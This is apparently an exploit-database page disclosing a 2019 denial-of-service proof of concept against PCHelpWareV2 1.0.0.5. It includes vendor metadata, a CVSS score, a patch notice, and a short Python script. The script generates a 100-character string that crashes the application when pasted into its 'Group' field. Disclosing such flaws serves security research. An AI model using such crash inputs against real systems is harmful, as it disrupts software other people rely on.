PCHelpWareV2 1.0.0.5 - 'Group' Denial of Service (PoC)

vendor:

PCHelpWareV2

by:

Alejandra Sánchez

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: PCHelpWareV2

Affected Version From: 1.0.0.5

Affected Version To: 1.0.0.5

Patch Exists: YES

Related CWE: N/A

CPE: a:uvnc:pchelpwarev2

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

PCHelpWareV2 1.0.0.5 – ‘Group’ Denial of Service (PoC)

PCHelpWareV2 1.0.0.5 is vulnerable to a denial of service attack when a maliciously crafted string is sent to the 'Group' field. When the 'Ok' button is clicked, the application will crash.

Mitigation:

The vendor has released a patch to address this vulnerability.

Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: PCHelpWareV2 1.0.0.5 - 'Group' Denial of Service (PoC)
# Date: 15/04/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.uvnc.com/home.html
# Software Link: http://www.uvnc.eu/download/pchw2/PCHelpWareV2.msi
# Version: 1.0.0.5
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "PCHelpWareV2.py", it will create a new file "PCHelpWareV2.txt"
# 2.- Copy the text from the generated PCHelpWareV2.txt file to clipboard
# 3.- Open PCHelpWareV2 Viewer
# 4.- Go to Properties
# 5.- Paste clipboard in 'Group' field and click on button 'Ok'
# 6.- Crashed

buffer = "\x41" * 100
f = open ("PCHelpWareV2.txt", "w")
f.write(buffer)
f.close()